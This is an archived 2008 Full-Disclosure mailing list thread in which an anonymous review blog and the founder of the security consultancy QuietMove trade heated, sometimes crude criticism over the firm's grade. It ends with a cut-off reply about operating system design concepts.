> Lastly, with respect to our comment about Marcin Wielgoszewski, a QuietMove consultant, being "Green", he confirmed that for us in an email. He wrote "You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD? Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date."
>
> All in all, our professional opinion is still that QuietMove doesn't have significant "strong" human talent behind their services. They appear to be a very small company run by someone that is not a "hacker" by nature but instead is a systems administrator or your advanced IT guy with a good understanding of Web Application Security. If you are looking to truly defend yourselves against malicious hackers then we suggest finding a different provider.
>
> Note: If we receive any information back from QuietMove, other than what we've received in emotional reactions, then we'll consider adding that information to this review. If QuietMove can provide us with proof of capability then we will accurately reflect that capability here. We're not in the business of bashing anyone even if they bash us or disrespect us. We are in the business of exposing Professional IT Security Service providers for what they really are to the best of our ability.
>
> If you feel that QuietMove deserves a better grade and can provide us with legitimate reasons as to why, then please comment and we'll consider it. (Even after all of their insults.)
>
> Score Card (image)
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed at 1/01/2008 10:38:00 PM
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From adam.muntner at quietmove.com Wed Jan 2 14:45:37 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 09:45:37 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com>
Message-ID: <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com>

Just to be clear, the corrections to secreview, reepex and Andre were intermingled. The ones I mentioned were the ones secreview and reepex, the anonymous cowards too embarrassed by their own ignorant commentary to stand behind them, called out.
Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'. He can't even spell the name of the company he reviews correctly. Secreview re-re-score: f---------------------------------------------------------------. :) Ho hum!

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 9:32 AM, Adam Muntner wrote:

> Andre is a friend but not an employee or representative of the business - HOWEVER - there were a number of inaccuracies in his statements about me. A selection of corrections to statements are below.
>
> - I never ran UPT
> - all the speculation about our methodology and pricing was wrong.
> - the quantity of automated vs hands on testing we perform is based on what the customer is willing to pay for. Novel concept. We explain carefully what can and can't be found. The customer selects their appropriate level of risk acceptance based on the value of the target of evaluation and their budget. We always try to go above and beyond.
> - our overhead is low - no giant headquarters - we are virtual mostly except for a rack cage. We don't have to support a giant marketing team and don't do $20k trade show booths. As a result that isn't built into our pricing.
> - I was never a 'Unix admin' but did engineer one of the early commercially avail Beowulf clusters - in 1998 - and have run some unix boxes, meaning it took all of 3 hours a month of my time, but I was not a 'unix admin' by any stretch of the imagination. The OpenBSD posts were from what, 10 years ago? More evidence of your poor arithmetic skills from the initial post.
> - the website wasn't updated because I am taking a vacation to NYC and would rather enjoy myself than meet some 12 hour unmentioned timetable to edit the website by an anonymous coward pfy.
> - they weren't insults, they were sarcastic though accurate representations of your subpar (at best) review capabilities
> - others but really, who cares? You are not interested in facts as I will prove below.
>
> Your analysis is worthless. Several weeks ago you posted your alleged methodology. It included contacting the vendor PRIOR to review, which you didn't do. You also didn't notify us of the review. I read it on FD myself.
>
> You sent a list of questions on new years day, after you posted the review, and half a day later posted your re-review without again contacting me directly except with a monster list of questions - not so much as a phone call. Your alleged review was based on list noise, not speaking with me.
>
> You still have yet to post your scoring methodology as promised. You fail.
>
> Frankly I find the drama and anonymous weenie-waving on this list to be tedious. FD is more a running joke than a productive mailing list. Save the drama fo yo mama.
>
> On my timetable I'll respond to your questions.... To the list, not to you directly. Frankly I don't trust you to represent them accurately. Right now I'm going to visit the Metropolitan Museum of Art, and tonight go party - not answer your essay test. Sorry to disappoint.
>
> As a number of list members commented privately to me - you don't deserve the attention.
>
> That said, if you can prove you will follow your own previously stated methodology, I'll re-review your review system. Following your methodology I will post a f----------- score in 6-12 hours or maybe sooner if you don't respond.
>
> That's a joke, son. ;)
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sorry for typos - sent from my 31337 jailbroken iPhone. It runs unix. I guess that makes me a unix admin!
>
> On Jan 2, 2008, at 2:17 AM, secreview wrote:
>
>> Our first QuietMove review can be found here.
>>
>> QuietMove, located at http://www.quietmove.com is a Professional IT Security Services company that was founded by Adam Muntner, Jeffrey Rassas and James G. (Jim) Garvey, Jr. We've already performed one review of QuietMove but Adam Munter and his team didn't like the review. As a result, we've gone back and revisited our data and are producing this second, hopefully more accurate review.
>>
>> Our first point of criticism is still the QuietMove web-site. Their services are poorly defined, and even somewhat contradictory. For example, under their Penetration Testing section they nearly bash the use of Automated tools. Shortly thereafter they go on to say that they offer services for nearly the same cost as "cookie-cutter" services.
>>
>> Well, we still have a problem with that. The overhead cost of using quality talent is always going to be far greater than the fees charged by vendors that sell automated scanning software. Any time someone tells us that they can offer "expert driven" services at the same price points or even nearly the same as a "cookie cutter" service, we say bullshit.
>>
>> Taking it a step further, we still stick by our previous opinion that the QuietMove website doesn't have much to offer prospective customers in the way of useful information. The services shown are very poorly defined; the grammar is still horrible, and frankly the website is incomplete. Want to see what we mean? Click on their "Social Engineering" tab under their service offerings; you'll notice that there is no description. We hope that their website does not reflect the quality of their services.
>>
>> When Adam Muntner read our previous post where we commented on the QuietMove Website he responded in a reactive, emotional, and unprofessional manner. You can read his response to our first post here, insults and all.
>> Unfortunately for Adam, his unprofessional attitude hurt QuietMove during this second review.
>>
>> Regardless, Adam did react to our website comments, and his reaction was as follows, verbatim:
>>
>> "Most of our clients are referred by others who are very satisfied with the work we perform. Not by the website. It doesn't get a lot of attention - were small but growing and focused on serving our clients. I know basic HTML seems like the pinnacle of achievement to you, but we aren't in the business of making pretty web pages. We discuss our methodology with our clients-we don't post it on the web. I know you were hoping to learn nimething. Hacking for dummies might be more your speed, after you perfect your Cunt and Paste skills."
>>
>> During this second round of review, we were able to locate more information about Adam. We found several posts that Adam made to different mailing lists about FreeBSD, OpenBSD, Systems Administration, etc. We also found a rather nice PowerPoint presentation that Adam created that clearly defined specific security services. So we know that Adam is not an idiot, but we don't know if he's actually a security guru. We're also wondering why Adam doesn't create the same quality content for his QuietMove website as he did for his presentation.
>>
>> In tandem with Adam's response to our initial review of QuietMove, Adam also had other friends and associates respond. One of those people was Andre Gironda who had a lot of great things to say about QuietMove, but also made the unfortunate mistake of tainting his credibility as a professional by directly attacking other vendors.
>>
>> Andre Gironda asked us who we are in one of his emails. He also indirectly accused us of exacting vengeance on QuietMove by performing a review.
>> While we've never been accused of this before by any of our other review subjects, we feel that we should state for the record that this is not some sort of vengeance play.
>>
>> Andre Gironda also said that he can vouch for Adam's 14 years of experience "and then some". Apparently when Andre met Adam of QuietMove, Adam was working as a Unix Security Administrator for Unphamiliar Territories (UPT), "a vulnerability research BBS that ran from 1989 - 1996." Also according to Andre Gironda, "...It was a prominent place for information about vulnerability research. Many held it in higher regard than Phrack magazine or any leading website/magazine during that time period."
>>
>> Sorry Andre, but we don't agree with your statement about UPT. Even more importantly, we're not sure how Adam's experience as a Unix Security administrator (aka systems admin) will help him offer professional IT Security Services. Adam needs to be able to protect his clients from real world hackers, not from failed tape backups and disk crashes.
>>
>> Andre went on to say that many "small businesses such as QuietMove have a hard enough time staying alive in this industry." He said "I suggest you pick on someone your own size even if you have a legitimate problem with QuietMove or Adam." Our response is that we have no problem with Adam or QuietMove. We found QuietMove by doing a google search for Penetration Testing.
>>
>> In a different email Andre lost all credibility with us because he decided to directly attack other companies that we've reviewed that received higher grades. If you compare the score cards between QuietMove and the other company that Andre bashes, you'll see why they got the good grade. Anyway, here's what Andre had to say (we'll comment later):
>>
>> "Look, you rated Denim Group as A-. You must either work there - or know the guys.
>> Dan Cornell is a moron compared to Adam Muntner - and his code is certainly worse (e.g. Sprajax).
>>
>> Adam and team know Burp Suite, use manual web application testing - in addition to traditional dynamic and static analysis.
>>
>> I have seen Adam and crew using Fortify Software's SCA and Tracer tools. I have seen them using Hailstorm ARC and modifying the Javascript included in the SmartAttack library. I would call this a best-of-breed security testing methodology.
>>
>> I have worked for many small companies myself who do not use ANY automated testing, including both open-source and commercial tools. I think this is stupid... and spent most of my time writing `for' loops in shell just to get around their limitation on "not writing scripts to automate things".
>>
>> I have also worked for small companies that "only" use scripting languages, or only use "the best" scripting language (usually Ruby, Python, or Perl) and write all their own automated tools. This is also stupid -- especially when existing toolsets have lots of great capability -- it's like re-inventing the wheel.
>>
>> Of course there are places that "only use" commercial automated tools, but I haven't actually met one yet. When I do -- I'll go ahead and post an obnoxious review about them. More people will read mine than anything you do -- and with my name on it -- they are certainly bound to take it a lot more seriously."
>>
>> Andre lost all credibility with our team when he insulted the Denim Group. We contacted the Denim Group and spoke directly with one of their founders when we did their review. Not only were we very impressed with them, but they provided us with great detail about their testing methodologies and service capabilities. Adam, Andre and the rest of the QuietMove team haven't provided us with anything tangible yet, and we've asked.
>> When we tried to contact them the first time we couldn't get hold of them, same for the second.
>>
>> We're still waiting to hear back from Adam at QuietMove with answers to our questions about the QuietMove services. If we hear back, we'll modify this blog entry yet again to properly reflect what we feel is the truth. We'd also like to make the professional suggestion that QuietMove think about their professional image before they respond to anyone in a public forum. Not only does their reaction not look good, but it could make prospective customers turn away.
>>
>> Lastly, with respect to our comment about Marcin Wielgoszewski, a QuietMove consultant, being "Green", he confirmed that for us in an email. He wrote "You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD? Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date."
>>
>> All in all, our professional opinion is still that QuietMove doesn't have significant "strong" human talent behind their services. They appear to be a very small company run by someone that is not a "hacker" by nature but instead is a systems administrator or your advanced IT guy with a good understanding of Web Application Security. If you are looking to truly defend yourselves against malicious hackers then we suggest finding a different provider.
>>
>> Note: If we receive any information back from QuietMove, other than what we've received in emotional reactions, then we'll consider adding that information to this review. If QuietMove can provide us with proof of capability then we will accurately reflect that capability here.
>> We're not in the business of bashing anyone even if they bash us or disrespect us. We are in the business of exposing Professional IT Security Service providers for what they really are to the best of our ability.
>>
>> If you feel that QuietMove deserves a better grade and can provide us with legitimate reasons as to why, then please comment and we'll consider it. (Even after all of their insults.)
>>
>> Score Card (image)
>>
>> --
>> Posted By secreview to Professional IT Security Providers - Exposed at 1/01/2008 10:38:00 PM

From slash.pd at gmail.com Wed Jan 2 15:08:56 2008
From: slash.pd at gmail.com (Peter Dawson)
Date: Wed, 2 Jan 2008 10:08:56 -0500
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com>
Message-ID: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>

Adam,

I don't recall Rsnake or id posting a review on secreview. Is there a link you could share?
tia

/pd

On Jan 2, 2008 9:45 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:

> Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'
From adam.muntner at quietmove.com Wed Jan 2 15:26:17 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Wed, 2 Jan 2008 10:26:17 -0500
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To: <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com> <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
Message-ID:

It was a reply to the Larry Suto review of web app scanners RSnake posted. I commented on his blog post. The review was totally worthless.

Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 2, 2008, at 10:08 AM, "Peter Dawson" wrote:

> Adam
>
> I don't recall Rsnake or id posting a review on secreview. Is there a link you could share?
> tia
>
> /pd
>
> On Jan 2, 2008 9:45 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
>
>> Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'
From mukul.dharwadkar at gmail.com Wed Jan 2 15:41:42 2008
From: mukul.dharwadkar at gmail.com (Mukul Dharwadkar)
Date: Wed, 2 Jan 2008 09:41:42 -0600
Subject: [Full-disclosure] Fwd: Secreview re-review of quietmove ( F ---)
In-Reply-To:
References: <1199258252954.c15aa66b-499b-44dc-b8f9-5ed2366863fd@google.com> <69B8184A-012C-4779-B23D-57909EFAFFA7@quietmove.com> <616D94BA-60BB-4306-A69D-151FFB698E3E@quietmove.com> <8f1f7b60801020707w6b120300g519cd59a0e4a8e92@mail.gmail.com> <8f1f7b60801020708r17e21ff8h52d6cfd751e368c6@mail.gmail.com>
Message-ID:

With all due respect Adam, you would not have responded to these posts at all if you thought these reviews were worthless.

On 1/2/08, Adam Muntner wrote:
>
> It was a reply to the larry suto review of web app scanners rsnake posted. I commented on his blog post. The review was totally worthless.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> Phone: 602-793-5969
> Fax: 866-272-8194
> http://www.quietmove.com
>
> Sent from my iPhone
>
> On Jan 2, 2008, at 10:08 AM, "Peter Dawson" wrote:
>
>> Adam
>>
>> I don't recall Rsnake or id posting a review on secreview. Is there a link you could share?
>> tia
>>
>> /pd
>>
>> On Jan 2, 2008 9:45 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
>>
>>> Dre thx for pointing out the ha.ckers.org posts. More evidence of secreview selective quotation and/or ability to 'research'

--
Smile!!!
:) It improves your face value...
Visit me at http://www.dharwadkar.com http://www.dharwadkar.org
Sister Site: http://www.saraswatibhuvan.org

From secreview at hushmail.com Wed Jan 2 18:08:13 2008
From: secreview at hushmail.com (SecReview)
Date: Wed, 02 Jan 2008 13:08:13 -0500
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
Message-ID: <20080102180813.C5B5050038@mailserver9.hushmail.com>

Hi Adam,

We've said this before and will say this again, this time to everyone. We would be more than happy to give your company (QuietMove) a "better" review if you'd enable us to do that. So far you haven't helped us to effectively review you at all.

We tried to call you before our initial review, but never got hold of anyone. We also sent you an email before writing our second review, and you never responded to any of the questions in that email. If you'd like us to do a better review then provide us with the information that you think we will need to get the job done.

Our current review is the product of your website, emails that you've posted to this and other forums, and your reaction to our first review. We haven't been able to find anything related to major accomplishments by you or by QuietMove, we haven't seen any sample reports, and we haven't received any answers to any questions about your methodologies for service execution and delivery. We even think that our current review might be too harsh, but can't change anything without more information. If you want us to change our review, we can do that again and we can do it in a non-biased way (regardless of all the rants and noise).
We need you to tell us about your service delivery methodologies, your reporting methodologies, how you define specific service offerings, what markets you play in, and if possible sanitized sample reports. We won't publish any of that information directly, but we would use that to produce your next review.

We want our reviews to accurately and truthfully reflect the quality and professionalism of the providers that we study. (In fact, if anyone has any suggestions as to how we could better "rank" security companies we'd be more than happy to listen and consider those suggestions.)

Hope this helps. This will be our last email about QuietMove unless you request a redo of the current review. We will only redo the review if you are able to provide us with accurate information to help us get it done. We think that you should do it, because we think that you can score much better than an F+. (You're clearly not an idiot and you do have at least some experience.)

-the end.

Regards,
The Secreview Team
http://secreview.blogspot.com

Professional IT Security Service Providers - Exposed

From Valdis.Kletnieks at vt.edu Wed Jan 2 18:39:21 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 13:39:21 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: Your message of "Tue, 01 Jan 2008 12:33:36 CST."
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <22264.1199299161@turing-police.cc.vt.edu>

On Tue, 01 Jan 2008 12:33:36 CST, reepex said:
> Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C?
C is not a prerequisite for understanding operating systems design. It's only needed if the particular operating system you're working with implements its internals in C. What is more important is understanding the *concepts* - things like locking, and race conditions, and how fine-grained locking you need/want for a filesystem. Having one big lock is a lot easier, but causes contention - having a lot of little locks can cause deadlocks, especially in error handlers. What does the filesystem code do if (for example) it gets 2/3 of the way through the rename of a file, and encounters an I/O error while writing out the removal of the old name of the file? What are the trade-offs required for an operating system to support jitter-free multimedia applications (the first thing to learn is that throughput, latency, and jitter are intertwined, and it's very difficult to do all 3 well at the same time)? It's also important to understand that there are approaches other than Windows and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and have a lot to tell us about other choices that can be made. There's still a lot of VMS running out there in scattered corners as well - and that system had a lot of concepts that one should understand, at least well enough to know why "my favorite system didn't do it that way because..." (Hint - consider how and why SYS$FOO variables worked in VMS, and why they're so hard to get working correctly under Linux - they're *not* exactly the same as Un